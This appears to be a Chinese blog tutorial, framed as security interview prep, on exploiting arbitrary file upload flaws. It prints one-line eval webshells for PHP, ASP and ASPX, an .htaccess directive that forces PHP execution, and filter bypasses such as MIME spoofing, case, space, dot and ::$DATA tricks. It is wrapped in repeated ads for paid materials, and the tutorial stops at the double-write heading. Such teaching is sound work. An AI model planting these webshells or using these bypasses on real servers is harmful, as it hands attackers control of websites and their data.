任意文件上传,2024年网络安全开发者常见面试题

先自我介绍一下,小编浙江大学毕业,去过华为、字节跳动等大厂,目前阿里P7

深知大多数程序员,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年最新网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
img
img
img
img
img
img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上网络安全知识点,真正体系化!

由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新

如果你需要这些资料,可以添加V获取:vip204888 (备注网络安全)
img

正文

危害:

攻击者可获得网站控制权限

查看、修改、删除网站数据

通过提权漏洞可获得主机权限

二、webshell

1、概念

Webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。

2、示例

php的一句话木马:

<?php @eval($_POST['pass']);?>

asp的一句话木马:

<%eval request ("pass")%>

aspx的一句话木马:

<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>

三、所需条件

  • 木马上传成功,未被杀
  • 知道木马的路径在哪
  • 上传的木马能正常运行(解析)

四、绕过

  • 判断点1:上传一个非法文件,返回结果是否快,如果返回快,则为客户端检测
  • 判断点2:上传一个非图片内容,但是后缀名为图片的文件,是否成功,成功则为黑名单
  • 判断点3:上传一个非图片后缀的文件(随便编写的后缀名),上传失败,为白名单
  • 判断点4:上传成功后的图片的大小、MD5值等是否发生改变,若改变,则为重新渲染

接下来,将按图上所述分类进行解释

1、JS前端验证

在客户端验证上传的文件是否合法

①源码分析

②绕过

方法一、使用burp直接删除掉JS代码之后就可以绕过JS验证

方法二、利用浏览器的审查工具剔除JS之后,保存为新文件然后进行文件上传

③访问文件

2、MIME-Type验证

服务端MIME类型检测是通过检查http包的Content-Type字段中的值来判断上传文件是否合法。部分网站上传功能只对文件类型做了判断,抓包修改文件类型可绕过限制

常见MIME类型

  • 超文本标记语言文本 .html text/html
  • xml 文档 .xml text/xml
  • 普通文本 .txt text/plain
  • RTF 文本 .rtf application/rtf
  • PDF 文档 .pdf application/pdf
  • Microsoft Word 文件 .word application/msword
  • PNG 图像 .png image/png
  • GIF 图形 .gif image/gif
  • JPEG 图形 .jpeg,.jpg image/jpeg
  • au 声音文件 .au audio/basic
  • MIDI 音乐文件 mid,.midi audio/midi,audio/x-midi
  • RealAudio 音乐文件 .ra, .ram audio/x-pn-realaudio
  • MPEG 文件 .mpg,.mpeg video/mpeg
  • AVI 文件 .avi video/x-msvideo
  • GZIP 文件 .gz application/x-gzip
  • TAR 文件 .tar application/x-tar
  • 任意的二进制数据 application/octet-stream
①源码分析

如果type不是image/jpeg、image/png、image/gif,则无法成功上传

所以我们需要修改对应的mine-type为以上几个值

②绕过

使用burp抓包后修改

③访问文件

3、后缀检测

1)黑名单与白名单区别
  • 基于白名单验证:只针对白名单中有的后缀名,文件才能上传成功
  • 基于黑名单验证:只针对黑名单中没有的后缀名,文件才能上传成功
2)黑名单绕过
.htaccess文件绕过
①原理

htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能

SetHandler application/x-httpd-php
设置当前目录所有文件都使用PHP解析,那么无论上传任何文件,只要文件内容符合PHP语言代码规范,就会被当作PHP执行。不符合则报错。

②前提条件

Apache中如果需要启动 .htaccess,必须在http.conf中设置 AllowOverride

③源码

这里的黑名单中没有.htaccess

那么我们上传.htaccess文件来设置使用php解析任意文件

④上传.htaccess文件

⑤上传file.png后访问

大小写绕过
①原理
  • Windows系统下,对于文件名中的大小写不敏感。例如:test.php和TeSt.PHP是一样的
  • Linux系统下,对于文件名中的大小写敏感。例如:test.php和 TesT.php就是不一样的
②源码

这里没有对大小写过滤

③上传.pHP文件并访问

空格绕过
①原理

Windows系统下,对于文件名中空格会被作为空处理,程序中的检测代码却不能自动删除空格。从而绕过黑名单

②源码

③上传文件,使用burpsuite抓包后,添加空格

④访问文件

.号绕过
①原理

Windows系统下,文件后缀名最后一个点会被自动去除

②源码

③上传文件,使用burpsuite抓包后,添加.号

④访问文件

特殊符号绕过
①原理

Windows系统下,如果上传的文件名中test.php::$DATA会在服务器上生成一个test.php的文件,其中内容和所上传文件内容相同,并被解析

②源码

③上传文件,使用burpsuite抓包后,添加::$DATA

④访问文件

将::$DATA

路径拼接绕过
①原理

在没有对上传的文件进行重命名的情况下,用户可以自定义文件名并在服务器中上传新建,就会造成对应的绕过黑名单

例如:用户新建 1.php.+空格+.
deldot删除最后一个点之后,不再进行删除,trim删除空格,那么最终上传的文件名为 1.php.利用Windows自动去除最后一个点,导致成功上传1.php

②源码

③上传文件,使用burpsite抓包后修改

④访问文件

双写绕过

给大家的福利

零基础入门

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

同时每个成长路线对应的板块都有配套的视频提供:

在这里插入图片描述

因篇幅有限,仅展示部分资料

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化的资料的朋友,可以添加V获取:vip204888 (备注网络安全)
img

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

05d99a.png)

同时每个成长路线对应的板块都有配套的视频提供:

在这里插入图片描述

因篇幅有限,仅展示部分资料

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化的资料的朋友,可以添加V获取:vip204888 (备注网络安全)
[外链图片转存中…(img-3HmjVkq7-1713216837508)]

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

  • 9
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值